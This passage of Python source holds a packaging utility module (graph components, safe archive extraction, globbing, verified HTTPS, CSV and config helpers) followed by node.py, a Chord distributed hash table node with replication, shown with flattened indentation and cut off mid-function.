def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
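# Illustrative sketch: get_steps() returns the predecessors of a step in the
# order they need to run. The step names are assumed examples.
def _example_sequencer():  # pragma: no cover - documentation only
    seq = Sequencer()
    seq.add('compile', 'link')
    seq.add('link', 'package')
    assert list(seq.get_steps('package')) == ['compile', 'link', 'package']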
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
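# Illustrative sketch: the patterns are hypothetical and the results depend
# on the local filesystem.
def _example_iglob():  # pragma: no cover - documentation only
    recursive = list(iglob('src/**/*.py'))              # '**' recursive glob
    alternates = list(iglob('docs/{index,intro}.rst'))  # {a,b} alternatives
    return recursive, alternates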
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
                # we support both '/' and '\' as the separator after '**'
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
CertificateError)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
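#
# Illustrative usage (a sketch, not part of this module's API): the handler can
# be installed in a urllib opener so that plain-HTTP requests are rejected.
# `build_opener` is assumed to come from urllib.request (or the compat shim
# used above); 'certs.pem' is a hypothetical CA bundle path.
#
#   opener = build_opener(HTTPSOnlyHandler(ca_certs='certs.pem'))
#   opener.open('https://example.com/simple/')   # allowed
#   opener.open('http://example.com/simple/')    # raises URLError
#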
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
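# Illustrative sketch (not from the original source): roughly the kind of config
# fragment configure_custom() accepts. '()' names the callable to resolve,
# '[]' supplies positional args and '.' supplies attributes to set afterwards.
#
#   cfg = {
#       '()': 'collections.OrderedDict',
#       '[]': [[('a', 1), ('b', 2)]],
#   }
#   # Configurator({'obj': cfg})['obj'] -> OrderedDict([('a', 1), ('b', 2)])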
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub(r"[-_.]+", "-", name).lower()
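# Illustrative behaviour (sketch, not part of the module):
#   normalize_name('Foo_Bar.baz')  -> 'foo-bar-baz'    (PEP 503 normalisation)
#   list(iglob('src/**/*.py'))     -> every .py file under src/, recursively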
|
node.py
|
from hashlib import sha1
import requests
import json
import random
from source.message import *
from source.lib import *
import threading
'''
Contains code for node class
implementing basic insertion, query operations
to the network. It handles graceful join and departure
'''
def getId(ip):
return int(sha1(ip.encode()).hexdigest(),16)%10
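# getId hashes an ip (or key) string with SHA-1 and reduces it modulo 10, so
# every node and every key lands on one of ten fixed Chord positions, 0..9.
# The mapping is deterministic: the same string always maps to the same slot.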
class Node:
'''
Chord node definitions: node state, previous/next neighbour links and the
DHT operations (insert, query, delete) plus graceful join/depart handling.
'''
def __init__(self, ip, BOOTSTRAP_IP, n_replicas=1, isBootstrap=False, policy=None, verbose=True):
'''initializations'''
if(verbose):
print(f"Created node with ip: {ip}, bootstrap ip: {BOOTSTRAP_IP}, isBootstrap={isBootstrap}")
self.ip=ip
self.isBootstrap = isBootstrap
self.BOOTSTRAP_IP = BOOTSTRAP_IP
#self.id = None #sha1(self.ip.encode()).hexdigest() #hash in hexadecimal
self.assigned_id = None #assigned Chord position
self.DHT = {} # hash table for this node
self.prev_ip = None
self.next_ip = None
self.prev_id = None
self.next_id = None
self.policy = None
self.msg_id = 0
self.responses = {}
self.ack = {}
self.ack_value = {}
self.n_replicas = n_replicas
if self.n_replicas > 1:
self.repl_DHT = {} # key: hashkey, value: val (dummy). Data replicated from other nodes.
self.replicas = {} # key: id, value: ip for the node's replicas.
self.prev_nodes = {} #key: id, value ip for the node's previous nodes
self.policy = policy
def clear(self):
self.__init__(ip=self.ip, BOOTSTRAP_IP=self.BOOTSTRAP_IP, \
n_replicas=self.n_replicas, isBootstrap=self.isBootstrap, verbose=False)
def set_prev(self, ip, id):
'''
Update node's previous node with input ip
'''
self.prev_ip = ip
self.prev_id = id
def set_next(self, ip, id):
'''
Update node's next node with input ip
'''
self.next_ip = ip
self.next_id = id
def setDHT(self,dht_dict):
self.DHT = dht_dict.copy()
def setReplDHT(self, repl_dht_dict):
self.repl_DHT = repl_dht_dict.copy()
def setAck(self, msg_id, msg_val):
self.ack[msg_id] = msg_val
def setAckValue(self, msg_id, msg_val):
self.ack_value[msg_id] = msg_val
def setOverlayResponses(self, msg_id, msg_val):
print("a:", msg_id)
print("type of msg_id:", type(msg_id))
if type(msg_id)==str:
self.responses[msg_id] = msg_val
print("dict:", self.responses)
else:
print("Set Overlay Response ERRROR")
def insertToDht(self, key, hash, val):
self.DHT[hash][key] = val
def deleteFromDht(self, key, hash):
if key in self.DHT[hash]:
self.DHT[hash].pop(key)
def queryFromDht(self, key, hash):
if key in self.DHT[hash]:
res = self.DHT[hash][key]
else:
res ="Not found"
return res
def insertToReplDht(self, key, hash, val):
self.repl_DHT[hash][key] = val
def deleteFromReplDht(self, key, hash):
if key in self.repl_DHT[hash]:
self.repl_DHT[hash].pop(key)
def queryFromReplDht(self, key, hash):
if key in self.repl_DHT[hash]:
res = self.repl_DHT[hash][key]
else:
res ="Not found"
return res
def notify_join_prev(self):
ntf_prev_req = (requests.get("http://"+self.prev_ip+f"/accept_join_next/{self.ip}/{self.assigned_id}")).json()
def notify_join_next(self):
ntf_next_req = (requests.get("http://"+self.next_ip+f"/accept_join_prev/{self.ip}/{self.assigned_id}")).json()
# the response contains a status plus the part of next's DHT that this node now owns
self.DHT = ntf_next_req["DHT"]
def notify_depart_prev(self):
ntf_prev_req = (requests.get("http://"+self.prev_ip+f"/accept_depart_next/{self.next_ip}/{self.next_id}")).json()
def notify_depart_next(self):
#print("DHT", self.DHT)
departee_dict = json.dumps(self.DHT)
#print("JSON:", departee_dict)
ntf_next_req = (requests.post("http://"+self.next_ip+f"/accept_depart_prev/{self.prev_ip}/{self.prev_id}",\
json=self.DHT)).json()
def notify_repl_join_next(self):
'''
notify the k-1 next neighbours to get the appropriate keys
If not using replicas, this function doesn't do anything
'''
print("\x1b[31mNext Nodes:\x1b[0m", self.replicas.keys())
if self.n_replicas > 1:
# equivalent to replicas != {}, i.e. the network does use replicas
for repl_ip in self.replicas.values():
# get replicas DHT
replicas_DHT = (requests.get("http://"+repl_ip+"/get_DHT")).json()["DHT"]
# and merge it with current node's repl_DHT
self.repl_DHT = merge_dict(self.repl_DHT, replicas_DHT)
def notify_repl_join_prev(self, overlay):
'''
notify the k-1 prev neighbours to get the appropriate keys.
If not using replicas, this function doesn't do anything.
'''
print("\x1b[31mPrev Nodes:\x1b[0m", self.prev_nodes.keys())
if self.n_replicas > 1:
counter = list(range(self.n_replicas, 0, -1))
for i, repl_ip in enumerate(self.prev_nodes.values()):
# notify previous nodes to delete appropriate keys from their repl_DHT
# since other nodes replicate them now (after a join)
if len(overlay) > self.n_replicas:
req = (requests.post("http://"+repl_ip+f"/delete_from_repl_DHT/{self.assigned_id}/{counter[i]}", json=overlay)).json()
add = (requests.post("http://"+repl_ip+f"/insert_me_to_your_repl_DHT", json=self.DHT)).json()
def find_DHT_part(self, n, overlay):
temp = str(self.assigned_id)
flag_start = temp
for i in range(int(n)-1):
temp = overlay[temp]
if i == int(n)-3:
flag_start = temp
flag_end = temp
length = (int(flag_end) - int(flag_start)) % 10
keys = [(i+int(flag_start)) % 10 for i in range(1, length+1)]
DHT = {}
print("\x1b[36mRepl DHT\x1b[0m", self.repl_DHT.keys())
for key in keys:
DHT[str(key)] = self.repl_DHT[str(key)]
return DHT
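# Worked example (added for clarity): with assigned_id = 3 and n = 3, if the
# overlay chain is 3 -> 5 -> 7, then flag_start = 5, flag_end = 7,
# length = (7 - 5) % 10 = 2 and keys = [6, 7]: the hash buckets strictly after
# flag_start up to and including flag_end are taken out of repl_DHT.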
def notify_repl_depart_prev(self, overlay):
if self.n_replicas > 1:
counter = list(range(self.n_replicas, 0, -1))
for i, repl_ip in enumerate(self.prev_nodes.values()):
# notify previous nodes to insert the appropriate keys into their repl_DHT,
# since they become responsible for replicating them once this node departs
DHT = self.find_DHT_part(counter[i], overlay)
print("\x1b[32mDHT keys to be inserted\x1b[0m", DHT.keys())
req = (requests.post("http://"+repl_ip+f"/insert_to_repl_DHT", json=DHT)).json()
#add = (requests.post("http://"+repl_ip+f"/insert_me_to_your_repl_DHT", json=self.DHT)).json()
def join(self):
'''
API request to join the P2P network.
Request is sent to self.BOOTSTRAP_IP
should set self.prev, self.next
'''
if self.isBootstrap:
self.assigned_id = getId(self.ip)
self.id_ip_dict[self.assigned_id] = self.ip
self.overlay_dict= {str(self.assigned_id):None}
self.reverse_overlay_dict = {str(self.assigned_id):None}
print("joined with assigned id", self.assigned_id)
# load data from local directory. ONLY FOR TESTING DELETE LATER
# print("http://"+self.ip+"/load_data_from_file")
# requests.get("http://"+self.ip+"/load_data_from_file")
return {"text": "This is the bootstrap node", \
"assigned_position": getId(self.ip),\
"prev": self.prev_ip, \
"next": self.next_ip, \
"status": "Success" }
else:
join_req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/check_join/{self.ip}")).json()
self.prev_ip = join_req["prev_ip"]
self.next_ip = join_req["next_ip"]
self.prev_id = getId(join_req["prev_ip"])
self.next_id = getId(join_req["next_ip"])
self.replicas = join_req["replicas"]
self.prev_nodes = join_req["prev_nodes"]
self.assigned_id = join_req["assigned_position"]
overlay = join_req["overlay"]
print("joined with assigned id", self.assigned_id, "prev id", \
self.prev_id, "next id", self.next_id)
# notify previous and next node. Get corresponding DHTs.
self.notify_join_prev()
self.notify_join_next()
# notify previous and next to refresh their repl_DHT and update current node's repl_DHT
self.notify_repl_join_prev(overlay)
self.notify_repl_join_next()
return {"status": "Success", \
"text": f"Joined with prev: {self.prev_ip}, next: {self.next_ip}", \
"prev": self.prev_ip, \
"next": self.next_ip, \
"assigned_position": self.assigned_id
}
def depart(self):
'''
API request to gracefully depart from the P2P Network.
Request is sent to self.BOOTSTRAP_IP
should update prev, next
'''
if self.isBootstrap:
return {"text": "This is Bootstrap node. Undefined Behavour",\
"status": "Success"}
else:
depart_req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/check_depart/{self.assigned_id}")).json()
if depart_req["status"] == "Success":
# must notify neighbours about departure
self.prev_nodes = depart_req["prev_nodes"]
self.overlay = depart_req["overlay"]
self.notify_depart_prev()
self.notify_depart_next()
self.notify_repl_depart_prev(self.overlay)
print("\x1b[36mID:\x1b[0m", self.assigned_id)
req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/update/{str(self.assigned_id)}")).json()
self.clear()
return {"status": "Success", \
"text": f"Depart from P2P network with id {self.assigned_id}, prev {self.prev_id} and next {self.next_id}."}
else:
print(f"\x1b[31mError at depart procedure for id {self.assigned_id}\x1b[0m")
def insert(self, key, value):
'''
API request to insert a value. If the key already exists,
the value is updated instead.
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
self.insertToDht(key, hashkey, value)
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
else:
msg_id = self.getMsgId()
self.setAck(msg_id, False)
#print("First Node:", self.getAck())
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key, val_data=value)
# propagate insertion to next node
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert/", json=insert_msg.__dict__)).json()
# wait for response at wait4insert endpoint.
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def threading_node_replicas(self, dictionary, mode):
req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=dictionary)).json()
return req
def insert_eventual(self, key, value):
'''
API request to insert a value into all replicas following eventual consistency.
If the key already exists, its value is updated instead.
Only to be called when replication is enabled.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
print("\x1b[36mHashkey:\x1b[0m", hashkey)
print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.insertToDht(key, hashkey, value)
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Insertion"
x = threading.Thread(target=self.threading_node_replicas, args = [insert_msg.__dict__, mode])
x.start()
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
x.join()
# elif hashkey in self.getReplDHT().keys():
else:
# node is not replica manager for this particular hashkey
if hashkey in self.getReplDHT().keys():
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1,direction = 'l')
else:
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert_2manager/", json=insert_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def insert_chain(self, key, value):
'''
API request to insert a value into all replicas following linearizability
(chain replication). If the key already exists, its value is updated instead.
Only to be called when replication is enabled with chain replication.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
print("\x1b[36mHashkey:\x1b[0m", hashkey)
print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.insertToDht(key, hashkey, value)
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Insertion"
insert_req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=insert_msg.__dict__)).json()
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
# elif hashkey in self.getReplDHT().keys():
else:
if hashkey in self.getReplDHT().keys():
# node is not replica manager for this particular hashkey
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1, direction='l')
else:
# node is not replica manager for this particular hashkey
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert_2manager/", json=insert_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def delete(self, key):
'''
API request to delete the pair with the given key. If it doesn't exist,
nothing happens.
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
self.deleteFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successfuly removed pair with key: {key} from node: {self.assigned_id}"}
else:
# current node not responsible for hashKey. Construct Delete Message
msg_id = self.getMsgId()
self.setAck(msg_id, False)
#print("First Node:", self.getAck())
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key)
# propagate deletion to next node
deletion_req = (requests.post(f"http://{self.next_ip}/propagate_delete/", json=delete_msg.__dict__)).json()
# wait for response at wait4delete route
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
return wait_req
def delete_eventual(self, key):
'''
API request to delete the pair with the given key under eventual consistency.
If it doesn't exist, nothing happens.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
# print("\x1b[36mHashkey:\x1b[0m", hashkey)
# print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.deleteFromDht(key, hashkey)
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
# propagate replica deletion to replicas. Start with counter = n_replicas-1
mode = "Deletion"
y = threading.Thread(target=self.threading_node_replicas, args = [delete_msg.__dict__, mode])
y.start()
return {"status": "Success", \
"text": f"Successfuly deleted {key} from node {self.assigned_id}"}
y.join()
else:
# node is not replica manager for this particular hashkey
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
delete_req = (requests.post(f"http://{self.next_ip}/propagate_delete_2manager/", json=delete_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
